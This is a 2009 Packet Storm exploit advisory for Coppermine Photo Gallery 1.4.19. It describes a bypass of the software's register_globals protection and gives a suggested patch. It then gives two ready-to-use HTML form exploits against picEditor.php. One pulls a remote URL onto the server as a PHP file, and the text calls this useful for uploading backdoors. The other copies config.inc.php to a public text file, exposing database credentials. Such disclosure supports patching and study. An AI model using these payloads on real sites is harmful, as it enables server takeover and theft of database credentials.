Coppermine Photo Gallery 1.4.19 File Upload

2009-01-29T00:00:00
ID PACKETSTORM:74433
Type packetstorm
Reporter Michael Brooks
Modified 2009-01-29T00:00:00

Description

                                        
                                            `Written By Michael Brooks  
Special thanks to str0ke!  
  
  
Coppermine Photo gallery - Remote PHP File Upload  
Affects: v1.4.19  
Homepage: http://coppermine-gallery.net/  
5,239,057 downloads from sf.net!  
  
For this attack we need register_globals=on . The problem is that  
the anti-register_globals security can be bypassed.  
  
This is in /include/init.inc.php starting on line 42:  
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');  
//...  
if (is_array($_POST)) {  
foreach ($_POST as $key => $value) {  
if (!is_array($value))  
$_POST[$key] = strtr($value, $HTML_SUBST);  
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);  
}  
}  
  
if (is_array($_GET)) {  
foreach ($_GET as $key => $value) {  
unset($_GET[$key]);  
$_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);  
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);  
}  
}  
  
if (is_array($_COOKIE)) {  
foreach ($_COOKIE as $key => $value) {  
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);  
}  
}  
if (is_array($_REQUEST)) {  
foreach ($_REQUEST as $key => $value) {  
if (!is_array($value))  
$_REQUEST[$key] = strtr($value, $HTML_SUBST);  
if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);  
}  
}  
//...  
  
Here is a patch that will take care of register_globals.  
if(ini_get(register_globals)){  
foreach(get_defined_vars() as $var=>$val){  
//only keep superglobals we need on this whitelist, _SESSION will take care of its self:  
if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){  
unset($$var);  
}  
}  
}  
  
  
These 2 exploits are written in HTM, but they are NOT XSRF! This is  
a global variable manipulation issue, you can exploit this with CURL  
or whatever.  
  
This will copy www.google.com to  
http://127.0.0.1/cpg1419/albums/test.php . This is very useful for  
uploading backdoors.  
This is hijacking a call to copy() so we need allow_url_fopen=On ,  
which is default.  
<html>  
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"  
method=post>  
<input name="save" value=1>  
<input name="keysToSkip" value=1>  
<input name="_GET" value=1>  
<input name="_REQUEST" value=1>  
<input type=submit>  
</form>  
</html>  
  
  
This request will copy the database connection info and make it readable here:  
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt  
This attack works with allow_url_fopen=Off  
<html>  
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"  
method=post>  
<input name="save" value=1>  
<input name="keysToSkip" value=1>  
<input name="_GET" value=1>  
<input name="_REQUEST" value=1>  
<input type=submit>  
</form>  
</html>  
  
  
`